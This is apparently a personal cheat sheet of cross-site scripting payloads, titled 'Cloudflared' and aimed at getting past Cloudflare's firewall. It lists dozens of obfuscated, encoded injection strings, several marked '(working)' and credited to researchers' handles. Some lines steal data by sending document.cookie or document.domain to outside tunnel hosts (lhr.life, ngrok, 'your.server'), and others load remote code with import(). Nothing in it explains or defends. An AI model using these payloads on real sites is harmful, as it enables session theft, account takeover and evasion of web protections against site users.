Cloudflared

‘>alert(154)</script><script/154=’;;;;;;;

"><img src=x onerrora=confirm() onerror=confirm(1)>

touch '"><img src=x onerror=alert("xss!")>.pdf' fileupload

<button onclick="window.location.href='https://67b0-2406-8800-80-859d-85bb-207d-1ea7-7e76.ngrok-free.app'">Click me</button>

```"><img src=1 onerror=document.location=“https://2737d51a05b8b0.lhr.life/?”+document.cookie>```

"><img src=x onerror=alert(1)>

"><img src=x onerror=prompt(/hello_pepsi/)>

https://www.geeksforgeeks.org/tag/php-questions/page/7/?type="><img src=1 onerror=alert(1)>.gif

javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

<img+src%3dOnXSS+OnError%3dalert('XSs-Cloudflare-bypass-By-Dedi')>

"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>

'<<k>/script><<k>script>eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))<<k>/script>

<svg onload=alert&#0000000040"1")><””>

"\/>

<img%20s+src+c=x%20on+onerror+%20="alert(1)"\>

For email

a7madn1@gmail.com'\"><svg/onload=alert(/xss/)>

<a"/onclick=(confirm)()>Click Here!

Dec: <svg onload=prompt%26%230000000040document.domain)>

Hex: <svg onload=prompt%26%23x000000028;document.domain)>

xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

javascript:{ alert`0` }

1'"><img/src/onerror=.1|alert``>

<img src=x onError=import('//1152848220/')>

%2sscript%2ualert()%2s/script%2u

<svg on onload=(alert)(document.domain)>

<img ignored=() src=x onerror=prompt(1)>

<svg onx=() onload=(confirm)(1)>

“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

<svg on =i onload=alert(domain) (working)

<svg/onload=location/**/='https://your.server/'+document.domain>

<svg onx=() onload=window.alert?.()> (working)

test",prompt%0A/*HelloWorld*/(document.domain) (working)- @Brutelogic

"onx+%00+onpointerenter%3dalert(domain)+x" (working)- @Brutelogic

"><svg%20onload=alert%26%230000000040"1")> (working)- @IamRenganathan

%27%09);%0d%0a%09%09[1].find(alert)//

"><img src=1 onmouseleave=print()> - @itsgeekymonk

<svg on onload=(alert)(document.domain)> -@zapstiko

<svg/on%20onload=alert(1)> (working) -@aufzayed

<img/src=x onError="`${x}`;alert(`Ex.Mi`);"> -@ex_mi
